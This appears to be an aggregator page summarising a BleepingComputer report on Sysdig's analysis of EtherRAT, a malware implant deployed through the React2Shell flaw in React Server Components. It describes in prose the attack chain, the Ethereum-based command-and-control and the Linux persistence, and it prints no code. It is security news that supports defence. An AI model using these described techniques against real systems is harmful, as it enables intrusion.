"A new malware implant called EtherRAT, deployed in a recent React2Shell attack, runs five separate Linux persistence mechanisms and leverages Ethereum smart contracts for communication with the attacker. Researchers at cloud security company Sysdig believe that the malware aligns with North Korea's tools used in Contagious Interview campaigns. They recovered EtherRAT from a compromised Next.js application just two days after the disclosure of the critical React2Shell vulnerability tracked as CVE-2025-55182."
"Sysdig highlights EtherRAT's mix of sophisticated features, including blockchain-based command-and-control (C2) communication, multi-layered Linux persistence, on-the-fly payload rewriting, and evasion using a full Node.js runtime. Although there are substantial overlaps with "Contagious Interview" operations conducted by Lazarus, EtherRAT is different in several key aspects. React2Shell is a max-severity deserialization flaw in the React Server Components (RSC) "Flight" protocol that allows unauthenticated remote code execution via a crafted HTTP request."
"EtherRAT uses a multi-stage attack chain, starting with the exploitation of React2Shell to execute a base64-encoded shell command on the target, Sysdig says. The command attempts to download a malicious shell script ( s.sh) with curl, wget, or python3 as fallbacks, and loops every 300 seconds until successful. When the script is fetched, it is checked, turned into an executable, and launched."
EtherRAT is a new malware implant that runs five separate Linux persistence mechanisms and leverages Ethereum smart contracts for attacker communication. EtherRAT was recovered from a compromised Next.js application two days after disclosure of React2Shell (CVE-2025-55182). The malware includes blockchain-based C2, multi-layered Linux persistence, on-the-fly payload rewriting, and evasion using a full Node.js runtime. EtherRAT shows overlaps with Contagious Interview operations linked to Lazarus but differs in key aspects. React2Shell is a critical deserialization flaw in the React Server Components Flight protocol that enables unauthenticated remote code execution. Exploitation began hours after disclosure, triggering automated attacks and multiple sector breaches.
Read at BleepingComputer
Unable to calculate read time
Collection
[
|
...
]